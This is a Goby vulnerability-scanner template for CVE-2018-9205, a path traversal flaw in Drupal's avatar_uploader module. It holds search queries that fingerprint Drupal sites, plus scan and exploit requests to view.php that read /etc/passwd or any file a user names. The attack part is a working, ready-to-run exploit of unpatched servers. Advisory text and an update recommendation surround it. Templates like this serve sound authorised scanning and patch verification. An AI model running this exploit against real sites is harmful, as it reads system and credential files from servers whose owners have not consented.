Goby/json/Drupal-avatar_uploader-Local-File-Inclusion-(CVE-2018-9205).json

{
  "Name": "Drupal avatar_uploader Local File Inclusion (CVE-2018-9205)",
  "Description": "<p>avatar_uploader is a module in a content management system maintained by the Drupal community to implement the function of uploading user pictures.<br></p><p>There is a security vulnerability in the avatar_uploader 7.x-1.0-beta8 version, which is caused by the code in the view.php file not validating users or filtering file paths. An attacker could exploit this vulnerability to download arbitrary files.<br></p>",
  "Product": "Drupal",
  "Homepage": "https://www.drupal.org/",
  "DisclosureDate": "2022-03-26",
  "Author": "abszse",
  "FofaQuery": "header=\"X-Generator: Drupal\" || body=\"content=\\\"Drupal\" || body=\"jQuery.extend(Drupal.settings\" || (body=\"/sites/default/files/\" && body=\"/sites/all/modules/\" && body=\"/sites/all/themes/\") || header=\"ace-drupal7prod\" || (banner=\"Location: /core/install.php\")",
  "GobyQuery": "header=\"X-Generator: Drupal\" || body=\"content=\\\"Drupal\" || body=\"jQuery.extend(Drupal.settings\" || (body=\"/sites/default/files/\" && body=\"/sites/all/modules/\" && body=\"/sites/all/themes/\") || header=\"ace-drupal7prod\" || (banner=\"Location: /core/install.php\")",
  "Level": "2",
  "Impact": "<p>There is a security vulnerability in the avatar_uploader 7.x-1.0-beta8 version, which is caused by the code in the view.php file not validating users or filtering file paths. An attacker could exploit this vulnerability to download arbitrary files.<br></p>",
  "Recommendation": "<p>Follow the official website to update as soon as possible: <a href=\"https://www.drupal.org/\">https://www.drupal.org/</a><br></p>",
  "References": [
    "https://www.cnvd.org.cn/flaw/show/CNVD-2018-08816"
  ],
  "Is0day": false,
  "HasExp": true,
  "ExpParams": [
    {
      "name": "cmd",
      "type": "input",
      "value": "../../../../../../../../../../../etc/passwd",
      "show": ""
    }
  ],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd",
        "follow_redirect": false,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "root:x",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/sites/all/modules/avatar_uploader/lib/demo/view.php?file={{{cmd}}}",
        "follow_redirect": false,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          }
        ]
      },
      "SetVariable": [
        "output|lastbody||"
      ]
    }
  ],
  "Tags": [
    "Local File Inclusion"
  ],
  "VulType": [
    "Local File Inclusion"
  ],
  "CVEIDs": [
    "CVE-2018-9205"
  ],
  "CNNVD": [
    "CNNVD-201804-362"
  ],
  "CNVD": [
    "CNVD-2018-08816"
  ],
  "CVSSScore": "7.5",
  "Translation": {
    "CN": {
      "Name": "Drupal avatar_uploader 本地文件包含漏洞 (CVE-2018-9205)",
      "Product": "Drupal",
      "Description": "<p>avatar_uploader是Drupal社区所维护的一套内容管理系统中的用于实现上传用户图片功能的模块。<br></p><p>avatar_uploader 7.x-1.0-beta8版本中存在安全漏洞，该漏洞源于view.php文件中的代码没有校验用户或过滤文件路径。攻击者可利用该漏洞下载任意文件。<br></p>",
      "Recommendation": "<p>关注官网尽快更新：<a href=\"https://www.drupal.org/\">https://www.drupal.org/</a><br></p>",
      "Impact": "<p>avatar_uploader 7.x-1.0-beta8版本中存在安全漏洞，该漏洞源于view.php文件中的代码没有校验用户或过滤文件路径。攻击者可利用该漏洞下载任意文件。<br></p>",
      "VulType": [
        "本地⽂件包含"
      ],
      "Tags": [
        "本地⽂件包含"
      ]
    },
    "EN": {
      "Name": "Drupal avatar_uploader Local File Inclusion (CVE-2018-9205)",
      "Product": "Drupal",
      "Description": "<p>avatar_uploader is a module in a content management system maintained by the Drupal community to implement the function of uploading user pictures.<br></p><p>There is a security vulnerability in the avatar_uploader 7.x-1.0-beta8 version, which is caused by the code in the view.php file not validating users or filtering file paths. An attacker could exploit this vulnerability to download arbitrary files.<br></p>",
      "Recommendation": "<p>Follow the official website to update as soon as possible: <a href=\"https://www.drupal.org/\">https://www.drupal.org/</a><br></p>",
      "Impact": "<p>There is a security vulnerability in the avatar_uploader 7.x-1.0-beta8 version, which is caused by the code in the view.php file not validating users or filtering file paths. An attacker could exploit this vulnerability to download arbitrary files.<br></p>",
      "VulType": [
        "Local File Inclusion"
      ],
      "Tags": [
        "Local File Inclusion"
      ]
    }
  },
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  }
}